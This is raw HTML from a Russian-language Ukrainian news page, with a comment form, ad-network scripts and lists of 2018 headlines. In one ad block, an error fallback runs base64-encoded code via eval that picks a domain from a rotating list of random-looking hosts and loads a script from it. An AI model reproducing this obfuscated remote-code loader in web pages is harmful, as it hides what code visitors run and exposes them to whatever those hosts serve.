<strong class="ttl" title="Канада прекращает с Ираном дипломатические отношения"><a href="http://hronika.info/mir/28-kanada-prekraschaet-s-iranom-diplomaticheskie-otnosheniya.html">Канада прекращает с Ираном дипломатические отношения</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/ukraina/25-v-ukraine-krepnet-avtoritarizm-socintern.html"><img src="/posters/167_120_50_1/uploads/posts/2012-09/thumbs/1348080657_v-ukraine-krepnet-avtoritarizm.jpg" alt="В Украине крепнет авторитаризм - Социнтерн" class="l_n_im" title="В Украине крепнет авторитаризм - Социнтерн" />
</a>
<strong class="ttl" title="В Украине крепнет авторитаризм - Социнтерн"><a href="http://hronika.info/ukraina/25-v-ukraine-krepnet-avtoritarizm-socintern.html">В Украине крепнет авторитаризм - Социнтерн</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/ukraina/23-video-s-izbiratelnyh-uchastkov-budet-pokazano-na-specsayte.html"><img src="/posters/167_120_50_1/uploads/posts/2012-09/thumbs/1348079843_video-s-izbiratelnyh-uchastkov.jpg" alt="Видео с избирательных участков будет показано на спецсайте" class="l_n_im" title="Видео с избирательных участков будет показано на спецсайте" />
</a>
<strong class="ttl" title="Видео с избирательных участков будет показано на спецсайте"><a href="http://hronika.info/ukraina/23-video-s-izbiratelnyh-uchastkov-budet-pokazano-na-specsayte.html">Видео с избирательных участков будет показано на спецсайте</a></strong>
</li></ul>
        </div>
        <a class="buttons next" href="#"></a> 
      </div>
    </div>
</div>-->

<br />
<div id="comments_tab"><b>Оставьте свой комментарий</b>
<!--  <ul class="tabs">
  <li>
    <a href="#hronika">Хроника</a>
  </li>
<li>
    <a href="#vkontakte">Вконтакте</a>
  </li> 
  <li>
    <a href="#facebook">Фейсбук</a>
  </li>
</ul> -->
<div class="clr">
  <div id="hronika">
<form  method="post" name="dle-comments-form" id="dle-comments-form" action="/ukraina/324122-na-donbasse-v-zhilom-dome-nashli-boepripasy.html"><br />
<div class="baseform addcomfrm">
	<table class="tableform">
		
		<tr>
			<td class="label">
				Имя:<span class="impot">*&nbsp;&nbsp;</span>
				<input type="text" name="name" id="name" class="f_input" />
			</td>
		</tr>
		<tr>	
			<td class="label">E-Mail:<input type="text" name="mail" id="mail" class="f_input" style="margin-left:8px" /></td>
		</tr>
		
		<tr>	
			<td class="editorcomm"><script type="text/javascript">
<!--
var text_enter_url       = "Введите полный URL ссылки";
var text_enter_size       = "Введите размеры флэш ролика (ширина, высота)";
var text_enter_flash       = "Введите ссылку на флэш ролик";
var text_enter_page      = "Введите номер страницы";
var text_enter_url_name  = "Введите описание ссылки";
var text_enter_page_name = "Введите описание ссылки";
var text_enter_image    = "Введите полный URL изображения";
var text_enter_email    = "Введите e-mail адрес";
var text_code           = "Использование: [CODE] Здесь Ваш код.. [/CODE]";
var text_quote          = "Использование: [QUOTE] Здесь Ваша Цитата.. [/QUOTE]";
var text_upload         = "Загрузка файлов и изображений на сервер";
var error_no_url        = "Вы должны ввести URL";
var error_no_title      = "Вы должны ввести название";
var error_no_email      = "Вы должны ввести e-mail адрес";
var prompt_start        = "Введите текст для форматирования";
var img_title   		= "Введите по какому краю выравнивать картинку (left, center, right)";
var email_title  	    = "Введите описание ссылки";
var text_pages  	    = "Страница";
var image_align  	    = "left";
var bb_t_emo  	        = "Вставка смайликов";
var bb_t_col  	        = "Цвет:";
var text_enter_list     = "Введите пункт списка. Для завершения ввода оставьте поле пустым.";
var text_alt_image      = "Введите описание изображения";
var img_align  	        = "Выравнивание";
var img_align_sel  	    = "<select name='dleimagealign' id='dleimagealign' class='ui-widget-content ui-corner-all'><option value='' >Нет</option><option value='left' selected>По левому краю</option><option value='right' >По правому краю</option><option value='center' >По центру</option></select>";

var selField  = "comments";
var fombj    = document.getElementById( 'dle-comments-form' );
-->
</script>
<div class="bb-editor">
<div class="bb-pane" onmouseenter="if(is_ie9) get_sel(eval('fombj.'+ selField));">
<b id="b_b" class="bb-btn" onclick="simpletag('b')" title="Полужирный">Полужирный</b>
<b id="b_i" class="bb-btn" onclick="simpletag('i')" title="Наклонный текст">Наклонный текст</b>
<b id="b_u" class="bb-btn" onclick="simpletag('u')" title="Подчёркнутый текст">Подчёркнутый текст</b>
<b id="b_s" class="bb-btn" onclick="simpletag('s')" title="Зачёркнутый текст">Зачёркнутый текст</b>
<span class="bb-sep">|</span>
<b id="b_left" class="bb-btn" onclick="simpletag('left')" title="Выравнивание по левому краю">Выравнивание по левому краю</b>
<b id="b_center" class="bb-btn" onclick="simpletag('center')" title="По центру">По центру</b>
<b id="b_right" class="bb-btn" onclick="simpletag('right')" title="Выравнивание по правому краю">Выравнивание по правому краю</b>
<span class="bb-sep">|</span>
<b id="b_emo" class="bb-btn" onclick="ins_emo(this)" title="Вставка смайликов">Вставка смайликов</b>


<b id="b_color" class="bb-btn" onclick="ins_color(this)" title="Выбор цвета">Выбор цвета</b>
<span class="bb-sep">|</span>
<b id="b_hide" class="bb-btn" onclick="simpletag('hide')" title="Скрытый текст">Скрытый текст</b>
<b id="b_quote" class="bb-btn" onclick="simpletag('quote')" title="Вставка цитаты">Вставка цитаты</b>
<b id="b_tnl" class="bb-btn" onclick="translit()" title="Преобразовать выбранный текст из транслитерации в кириллицу">Преобразовать выбранный текст из транслитерации в кириллицу</b>
<b id="b_spoiler" class="bb-btn" onclick="simpletag('spoiler')" title="Вставка спойлера">Вставка спойлера</b>
</div>
<div id="dle_emos" style="display: none;" title="Вставка смайликов"><div style="width:100%;height:100%;overflow: auto;"><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':wink:'); return false;"><img style="border: none;" alt="wink" src="http://hronika.info/engine/data/emoticons/wink.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':winked:'); return false;"><img style="border: none;" alt="winked" src="http://hronika.info/engine/data/emoticons/winked.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':smile:'); return false;"><img style="border: none;" alt="smile" src="http://hronika.info/engine/data/emoticons/smile.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':am:'); return false;"><img style="border: none;" alt="am" src="http://hronika.info/engine/data/emoticons/am.gif" /></a></td></tr><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':belay:'); return false;"><img style="border: none;" alt="belay" src="http://hronika.info/engine/data/emoticons/belay.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':feel:'); return false;"><img style="border: none;" alt="feel" src="http://hronika.info/engine/data/emoticons/feel.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':fellow:'); return false;"><img style="border: none;" alt="fellow" src="http://hronika.info/engine/data/emoticons/fellow.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':laughing:'); return false;"><img style="border: none;" alt="laughing" src="http://hronika.info/engine/data/emoticons/laughing.gif" /></a></td></tr><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':lol:'); return false;"><img style="border: none;" alt="lol" src="http://hronika.info/engine/data/emoticons/lol.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':love:'); return false;"><img style="border: none;" alt="love" src="http://hronika.info/engine/data/emoticons/love.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':no:'); return false;"><img style="border: none;" alt="no" src="http://hronika.info/engine/data/emoticons/no.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':recourse:'); return false;"><img style="border: none;" alt="recourse" src="http://hronika.info/engine/data/emoticons/recourse.gif" /></a></td></tr><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':request:'); return false;"><img style="border: none;" alt="request" src="http://hronika.info/engine/data/emoticons/request.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':sad:'); return false;"><img style="border: none;" alt="sad" src="http://hronika.info/engine/data/emoticons/sad.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':tongue:'); return false;"><img style="border: none;" alt="tongue" src="http://hronika.info/engine/data/emoticons/tongue.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':wassat:'); return false;"><img style="border: none;" alt="wassat" src="http://hronika.info/engine/data/emoticons/wassat.gif" /></a></td></tr><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':crying:'); return false;"><img style="border: none;" alt="crying" src="http://hronika.info/engine/data/emoticons/crying.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':what:'); return false;"><img style="border: none;" alt="what" src="http://hronika.info/engine/data/emoticons/what.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':bully:'); return false;"><img style="border: none;" alt="bully" src="http://hronika.info/engine/data/emoticons/bully.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':angry:'); return false;"><img style="border: none;" alt="angry" src="http://hronika.info/engine/data/emoticons/angry.gif" /></a></td></tr></table></div></div>
<textarea name="comments" id="comments" cols="70" rows="10" onfocus="setNewField(this.name, document.getElementById( 'dle-comments-form' ))"></textarea>
</div></td>
		</tr>
			
			
		<tr>		
			<td class="label">Введите код: <span class="impot">*</span></td>	
			<td>	
				<div><span id="dle-captcha"><img src="/engine/modules/antibot/antibot.php" alt="Включите эту картинку для отображения кода безопасности" width="160" height="80" /><br /><a onclick="reload(); return false;" href="#">обновить, если не виден код</a></span></div>	
				<div><input type="text" name="sec_code" id="sec_code" style="width:115px" class="f_input" /></div>
			</td>	
		</tr>	
			
			
	</table>
	<br />
</div>
	<div class="fieldsubmit" style=" position: relative; width: 100%; height: 23px; top: -10px; ">	
		<button type="submit" name="submit" class="fbutton addcombut"><span>Добавить</span></button>
	</div>

		<input type="hidden" name="subaction" value="addcomment" />
		<input type="hidden" name="post_id" id="post_id" value="324122" /></form><script type="text/javascript">
<!--
$(function(){

	$('#dle-comments-form').submit(function() {
	  doAddComments();
	  return false;
	});

});

function reload () {

	var rndval = new Date().getTime(); 

	document.getElementById('dle-captcha').innerHTML = '<img src="/engine/modules/antibot/antibot.php?rndval=' + rndval + '" width="160" height="80" alt="" /><br /><a onclick="reload(); return false;" href="#">обновить, если не виден код</a>';

};
//-->
</script>
  </div>

  <!--
  <div id="vkontakte">


<script type="text/javascript" src="//vk.com/js/api/openapi.js?98"></script>

<script type="text/javascript">
  VK.init({apiId: 3098550, onlyWidgets: true});
</script>


<div id="vk_comments"></div>
<script type="text/javascript">
VK.Widgets.Comments("vk_comments", {limit: 10, width: "100%", attach: "*"});
</script>
      
  </div>
  <div id="facebook">
<div class="fb-comments" data-href="http://hronika.info/ukraina/324122-na-donbasse-v-zhilom-dome-nashli-boepripasy.html" data-width="410"></div>      
  </div>
  -->
  </div> 
</div>
 
<div id="dle-ajax-comments"></div>

<!--dlenavigationcomments-->
<div class="clr"><br /></div>
</div>
<div id='_mwayss-13a2bf393830a24cb00f9b493f869072'></div>
                <script>      
                    (function(window, document, undefined) {
                        var script_tag = document.createElement('script');
                        script_tag.src = 'https://ad.mediawayss.com/ad/mwayss_invocation.min.js?pzoneid=1171&height=288&width=512&tld=hronika.info&ctype=div&ch=DOMAIN_HERE';
                        var container = document.getElementById('_mwayss-13a2bf393830a24cb00f9b493f869072');    
                        container.parentNode.insertBefore(script_tag, container);
                    })(window, document);
                </script>
<script>
$.ctrl = function(key, callback, args) {
    var isCtrl = false;
    $(document).keydown(function(e) {
        if(!args) args=[]; 
        isCtrl = e.ctrlKey;
        if((e.keyCode == key.charCodeAt(0) || e.keyCode == 45) && isCtrl) callback.apply(this, args);
    }).keyup(function(e) {
        if(e.ctrlKey) isCtrl = false;
    });        
};
$.ctrl('C', function() {
    $('body').prepend("<div id='ctrl_c' class='ctrl_c' align='justify'><span>&times;</span>Использование материалов и новостей с сайта <a style='font-size: 11px;' href='http://hronika.info'>hronika.info</a> разрешается только при условии размещения прямой, открытой для поисковых систем, гиперссылки на опубликованную или цитируемую новость.</div>");
    $("#ctrl_c > span").click( function() { $("#ctrl_c").remove(); });

	
ns4 = (document.layers)? true:false
ie4 = (document.all)? true:false

function mousemove(event) {
        var mouse_x = y = 0;
    if (document.attachEvent != null) {
        mouse_x = window.event.clientX;
        mouse_y = window.event.clientY;
    } else if (!document.attachEvent && document.addEventListener) {
        mouse_x = event.clientX;
        mouse_y = event.clientY;
    }
    
}

    document.onmousemove=mousemove;

});

$(document).ready(function(){
var fimg=$(".ax-full img").first();
fimg.css({"width":"200px","height":"150px"});
});
</script>
</div></article>
            </div>
          </div>

             <aside id="sideRight2"><!---->

         <!-- 
		 <div class="wrap"> 
         	
         -->

<div class="row-600">
    <div class="col-336">
        <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<ins class="adsbygoogle"
     style="display:inline-block;width:336px;height:280px"
     data-ad-client="ca-pub-9393887096432784"
     data-ad-slot="3119660949"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
    </div>
    <div class="col-260">
       <!-- Асинхронный код информера news.2xclick.ru -->
<div id="gnezdo_ru_10484">Загрузка...</div>
<script language='JavaScript'>
	var s = document.createElement("script"),
	f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
	s.type = "text/javascript";
	s.async = true;
	s.src = '//news.2xclick.ru/show/10484/block_a.js';
	if (window.opera == "[object Opera]") {
		document.addEventListener("DOMContentLoaded", f);
	} else { f(); }
</script>
<!-- Конец кода информера news.2xclick.ru -->
        
    </div>
</div>



<div class="clr"></div>

<div class="width49-4 fleft">  
            <div class="wrap">
            <!-- Асинхронный код информера news.2xclick.ru -->
<div id="gnezdo_ru_10493">Загрузка...</div>
<script language='JavaScript'>
	var s = document.createElement("script"),
	f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
	s.type = "text/javascript";
	s.async = true;
	s.src = '//news.2xclick.ru/show/10493/block_a.js';
	if (window.opera == "[object Opera]") {
		document.addEventListener("DOMContentLoaded", f);
	} else { f(); }
</script>
<!-- Конец кода информера news.2xclick.ru -->
            <div id="MIXADV_1443" class="MIXADVERT_NET"></div>
          <script> 
          var node1443 = document.getElementById("MIXADV_1443");
          if( node1443 )
          {
               var script = document.createElement("script");
               script.charset = "utf-8";
               script.src = "https://m.mixadvert.com/show/?id=1443&r="+Math.random();
               node1443.parentNode.appendChild(script); 
               script.onerror = function(){
                  window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBkYXRlX251bWJlciA9IGRhdGUuZ2V0RGF0ZSgpIC0gMTt2YXIgbWFzID0gWyAiMXd3WVp4bnFNZy5zcGFjZSIsIndlOHg0OGh4ZzB4LmluZm8iLCIzYmxjdmpzamh5NS5pbmZvIiwiOWRrY3BweXhocy5zaXRlIiwiYmg4OWxxZnJkNTIuaW5mbyIsIjBhcWxvMmN0Zi5wcm8iLCJteXZ6dWM4Y3VtLnNpdGUiLCJwc2E5ZTljbzR0LnNwYWNlIiwiNnhwZHpiM2x2di5zaXRlIiwiWXVPNWxta2NWQy5zaXRlIiwibHAwemw2M253MzIuc2l0ZSIsIjJ6eWtpaXVncC5wcm8iLCJyYm1kbHZ1NXlnaS5zaXRlIiwiNXBwa3BmNHhweGIuc3BhY2UiLCJsNmhiYTdzb3NtMS5zaXRlIiwiZWo2YmVvd3VrenUuc3BhY2UiLCIyYTl6bDJ2OW4ucHJvIiwibndvazJpcXh2ZWwuc3BhY2UiLCJ4NGJ2emV1NzRqMS5zaXRlIiwidGpsZ2ZkZm5rLnRlY2giLCIyOGZhZXB0cTcudGVjaCIsInJybmhiODYzai50ZWNoIiwiYWs3MmV2aWljOW0uc2l0ZSIsImJrYmIzMTZmangzLnNwYWNlIiwiaWE3aWVrcXJuNXAuc2l0ZSIsIjJmNjFqdXB4ZHB2LnNwYWNlIiwieDl6eHEydXdqbXMuc2l0ZSIsImNxNDc1a2tubDd0aHpmLnRvcCIsImluaHo0OXhocGhhcjVrLnRvcCIsInM3c2R0Z3o3enJlNW1zLnRvcCIgXTtpZiggbWFzLmxlbmd0aCA8PSBkYXRlX251bWJlciApIHZhciBob3N0ID0gbWFzW01hdGguZmxvb3IoIGRhdGVfbnVtYmVyIC8gMiApXTsgZWxzZSB2YXIgaG9zdCA9IG1hc1tkYXRlX251bWJlcl07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgNSk7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDE0NDMgKiBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIityK2RlbHRhK2lkKyIiOyBub2RlMTQ0My5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7") );
              }
          }
          </script>
            <div id="M225926ScriptRootC608879">
        <div id="M225926PreloadC608879">
        Загрузка...
    </div>
        <script>
                (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("M225926ScriptRootC608879")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("M225926ScriptRootC608879");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=608879;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsc.marketgid.com/h/r/hronika.info.608879.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
    </script>
</div>
<!-- Composite End -->
            <!-- noindex -->
<div id="CNM4146" style="text-align:center;display:none" ><a href="https://www.novostimira.biz/" id="CNM4146t" style="display:none" rel="nofollow" target="_blank"><strong>Новости</strong></a></div>

<!-- before </body> -->
<script type="text/javascript" async="async" >
  var el = document.getElementById('CNM4146');
  if (el) {
    if (document.getElementById('CNM4146t').style.display == 'none') {
      document.getElementById('CNM4146t').style.display = '';
      var dateNM = new Date();
      var t = Math.floor(dateNM.getTime()/(1000*600));
      var NMces=document.createElement('script');
      NMces.type = 'text/javascript';
      NMces.charset='UTF-8';
      NMces.src='http'+(window.location.protocol=='https:'?'s':'')+'://c.novostimira.biz/l/4146?v='+t;
      el.parentNode.appendChild(NMces);
    }
  }
</script>
<!--/ noindex -->
            <!-- start NEW_v1_right for hronika.info -->
<div id="adpartner-jsunit-850">
    <script type="text/javascript">
        var head = document.getElementsByTagName('head')[0];
        var script = document.createElement('script');
        script.type = 'text/javascript';
        script.src = "//a4p.adpartner.pro/jsunit?id=850&" + Math.random();
        head.appendChild(script);
    </script>
</div>
<!-- end NEW_v1_right for hronika.info -->
             
            <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Side-1 -->
<ins class="adsbygoogle"
     style="display:inline-block;width:300px;height:600px"
     data-ad-client="ca-pub-9393887096432784"
     data-ad-slot="5084862545"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
				<h3>Хроника событий сегодня</h3>
               <div class="newsr_1">
    <span>08.06-19:59</span>
	<a href="http://hronika.info/kultura/324131-bella-hadid-porazila-figuroy-v-prozrachnom-naryade.html"><strong title="Белла Хадид поразила фигурой в прозрачном наряде">Белла Хадид поразила фигурой в прозрачном наряде</strong><b>25</b></a>
</div><div class="newsr_1">
    <span>08.06-19:53</span>
	<a href="http://hronika.info/neverojatnoe/324130-eti-trevozhnye-simptomy-mogut-signalizirovat-o-problemah-s-pochkami.html"><strong title="Эти тревожные симптомы могут сигнализировать о проблемах с почками">Эти тревожные симптомы могут сигнализировать о проблемах с почками</strong><b>148</b></a>
</div><div class="newsr_1">
    <span>08.06-19:52</span>
	<a href="http://hronika.info/fotoreportazhi/324029-plavni-dnepra-pokazali-s-vysoty-ptichego-poleta-foto.html"><strong title="Плавни Днепра показали с высоты птичьего полета. Фото">Плавни Днепра показали с высоты птичьего полета. Фото</strong><b>63</b></a>
</div><div class="newsr_1">
    <span>08.06-19:50</span>
	<a href="http://hronika.info/kurjozy/324084-polnyy-proval-nelepye-platya-na-vypusknoy.html"><strong title="Полный провал: нелепые платья на выпускной">Полный провал: нелепые платья на выпускной</strong><b>534</b></a>
</div><div class="newsr_1">
    <span>08.06-19:47</span>
	<a href="http://hronika.info/videonovosti/324129-v-kieve-desyatki-kormyaschih-mam-ustanovili-neobychnyy-rekord-video.html"><strong title="В Киеве десятки кормящих мам установили необычный рекорд. Видео">В Киеве десятки кормящих мам установили необычный рекорд. Видео</strong><b>234</b></a>
</div><div class="newsr_1">
    <span>08.06-19:41</span>
	<a href="http://hronika.info/sport/324128-nadal-v-11-y-raz-probilsya-v-final-rolan-garros.html"><strong title="Надаль в 11-й раз пробился в финал Ролан Гаррос">Надаль в 11-й раз пробился в финал Ролан Гаррос</strong><b>77</b></a>
</div><div class="newsr_1">
    <span>08.06-19:35</span>
	<a href="http://hronika.info/obwestvo/324127-v-kieve-bez-vody-ostalis-uchebnye-zavedeniya.html"><strong title="В Киеве без воды остались учебные заведения">В Киеве без воды остались учебные заведения</strong><b>238</b></a>
</div><div class="newsr_1">
    <span>08.06-19:29</span>
	<a href="http://hronika.info/avto/324126-mask-poobeschal-sdelat-novyy-roadster-esche-bystree.html"><strong title="Маск пообещал сделать новый Roadster еще быстрее">Маск пообещал сделать новый Roadster еще быстрее</strong><b>125</b></a>
</div><div class="newsr_1">
    <span>08.06-19:23</span>
	<a href="http://hronika.info/kriminal/324125-v-kievskom-metro-obokrali-rebenka.html"><strong title="В киевском метро обокрали ребенка">В киевском метро обокрали ребенка</strong><b>651</b></a>
</div><div class="newsr_1">
    <span>08.06-19:17</span>
	<a href="http://hronika.info/kultura/324124-59-letnyaya-madonna-sobralas-zamuzh.html"><strong title="59-летняя  Мадонна собралась замуж">59-летняя  Мадонна собралась замуж</strong><b>879</b></a>
</div>
                <div class="vsenovosti" title="Все новости хроники"><a href="/lastnews">Все новости хроники</a></div>
			</div>

               <div class="wrap">
				<h3>События сегодня</h3>           
</div>
   </div>   
   
   <div class="width49-4 fright">
   
   
<!--
<div id="ax_popular_comp">
	<ul class="tabs tshadow ax_tabs" style="height: 31px;">
		<li title="Компетентно" style="width: 147px;"><a href="#ax_comp">Компетентно</a></li>
		<li title="Актуально"><a href="#ax_actual">Актуально</a></li>		
	</ul>
	<div class="clr tabwrap">		
		<div id="ax_comp">
			<div class="b-tab-n1">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html"><img src="/posters/300_131_70_1/uploads/posts/2015-03/thumbs/1426164908_mvf.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-author"><a href="/kompetentno/">Наши эксперты</a></span>
	<span class="b-full-link"><a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html">«Согреют» ли деньги МВФ простых украинцев</a></span>
	
</div>

<div class="b-tab-n2">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html#author1"><img src="/posters/75_74_70_1/uploads/posts/2015-03/1426164917_lanov.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-full-link">Владимир Лановой</span>
</div>


<div class="b-tab-n2">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html#author2"><img src="/posters/74_74_70_1/uploads/posts/2015-03/1426164962_zhalilo.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-full-link">Ярослав Жалило</span>
</div>


<div class="b-tab-n2">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html#author3"><img src="/posters/75_74_70_1/uploads/posts/2015-03/1426165061_dubrov.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-full-link">Владимир Дубровский</span>
</div>


<div class="b-tab-n2">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html#author4"><img src="/posters/74_74_70_1/uploads/posts/2015-03/1426165044_shapran.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-full-link">Виталий Шапран</span>
</div>

		</div>			
		<div id="ax_actual">
			 <div class="b-tab-n1">
	<a href="http://hronika.info/politika/324069-protiv-nardepa-muraeva-nachato-ugolovnoe-proizvodstvo.html"><img src="/posters/300_131_70_1/uploads/posts/2018-06/thumbs/1528462638_muraev.jpg" alt="Против нардепа Мураева начато уголовное производство" title="Против нардепа Мураева начато уголовное производство" /></a>
	
	<span class="b-full-link"><a href="http://hronika.info/politika/324069-protiv-nardepa-muraeva-nachato-ugolovnoe-proizvodstvo.html">Против нардепа Мураева начато уголовное производство</a></span>

</div>
			 <div class="b-tab-n2">
	<a href="http://hronika.info/politika/324044-byvshiy-ohrannik-rasskazal-o-pisme-yanukovicha-putinu.html"><img src="/posters/74_74_70_1/uploads/posts/2018-06/thumbs/1528458081_yanukovich.jpg" alt="Бывший охранник рассказал о письме Януковича Путину" title="Бывший охранник рассказал о письме Януковича Путину" /></a>
	

</div><div class="b-tab-n2">
	<a href="http://hronika.info/politika/324001-muraev-nazval-sencova-terroristom.html"><img src="/posters/74_74_70_1/uploads/posts/2018-06/thumbs/1528450565_muraev.jpeg" alt="Мураев назвал Сенцова террористом" title="Мураев назвал Сенцова террористом" /></a>
	

</div><div class="b-tab-n2">
	<a href="http://hronika.info/politika/323990-groysman-predstavil-novogo-rukovoditelya-minfina.html"><img src="/posters/74_74_70_1/uploads/posts/2018-06/thumbs/1528447764_groysman.jpeg" alt="Гройсман представил нового руководителя Минфина" title="Гройсман представил нового руководителя Минфина" /></a>
	

</div><div class="b-tab-n2">
	<a href="http://hronika.info/politika/323956-v-mvf-obespokoeny-uvolneniem-danilyuka.html"><img src="/posters/74_74_70_1/uploads/posts/2018-06/thumbs/1528441579_danilyuk.jpeg" alt="В МВФ обеспокоены увольнением Данилюка" title="В МВФ обеспокоены увольнением Данилюка" /></a>
	

</div>
		</div>			         
	</div>
</div>

<div class="clr"></div>
 

-->      
       


			<div class="wrap">
				<h3 class="inbg">Мнения</h3> 
				<div>
					<div class="clr greenpeace_n2">
		<img src="/uploads/fotos/foto_1999.jpg" />
        <div>08.06.2018|17:00</div>
		<div class="b-new-author"><a onclick="ShowProfile('%D0%9C%D1%83%D1%81%D1%82%D0%B0%D1%84%D0%B0+%D0%9D%D0%B0%D0%B9%D0%B5%D0%BC', 'http://hronika.info/user/%D0%9C%D1%83%D1%81%D1%82%D0%B0%D1%84%D0%B0+%D0%9D%D0%B0%D0%B9%D0%B5%D0%BC/', '0'); return false;" href="http://hronika.info/user/%D0%9C%D1%83%D1%81%D1%82%D0%B0%D1%84%D0%B0+%D0%9D%D0%B0%D0%B9%D0%B5%D0%BC/">Мустафа Найем</a></div>
    	<strong><a href="http://hronika.info/mnenia/323849-antikorrupcionnyy-kokteyl-molotova.html">Антикоррупционный коктейль Молотова</a></strong>			
</div><div class="clr greenpeace_n2">
		<img src="/uploads/fotos/foto_1889.jpg" />
        <div>08.06.2018|16:15</div>
		<div class="b-new-author"><a onclick="ShowProfile('%D0%92%D0%B8%D0%BA%D1%82%D0%BE%D1%80+%D0%A3%D0%BA%D0%BE%D0%BB%D0%BE%D0%B2', 'http://hronika.info/user/%D0%92%D0%B8%D0%BA%D1%82%D0%BE%D1%80+%D0%A3%D0%BA%D0%BE%D0%BB%D0%BE%D0%B2/', '0'); return false;" href="http://hronika.info/user/%D0%92%D0%B8%D0%BA%D1%82%D0%BE%D1%80+%D0%A3%D0%BA%D0%BE%D0%BB%D0%BE%D0%B2/">Виктор Уколов</a></div>
    	<strong><a href="http://hronika.info/mnenia/323848-antikorupcyniy-sud-maye-bagato-batkv.html">Антикорупційний суд має багато «батьків»</a></strong>			
</div><div class="clr greenpeace_n2">
		<img src="/uploads/fotos/foto_1924.jpg" />
        <div>08.06.2018|15:30</div>
		<div class="b-new-author"><a onclick="ShowProfile('%D0%92%D0%B8%D0%BA%D1%82%D0%BE%D1%80+%D0%A2%D0%B0%D1%80%D0%B0%D0%BD', 'http://hronika.info/user/%D0%92%D0%B8%D0%BA%D1%82%D0%BE%D1%80+%D0%A2%D0%B0%D1%80%D0%B0%D0%BD/', '0'); return false;" href="http://hronika.info/user/%D0%92%D0%B8%D0%BA%D1%82%D0%BE%D1%80+%D0%A2%D0%B0%D1%80%D0%B0%D0%BD/">Виктор Таран</a></div>
    	<strong><a href="http://hronika.info/mnenia/323847-antikorupcyniy-sud-velikiy-krok-vpered.html">Антикорупційний суд: великий крок вперед</a></strong>			
</div><div class="clr greenpeace_n2">
		<img src="/uploads/fotos/foto_1965.jpg" />
        <div>08.06.2018|14:45</div>
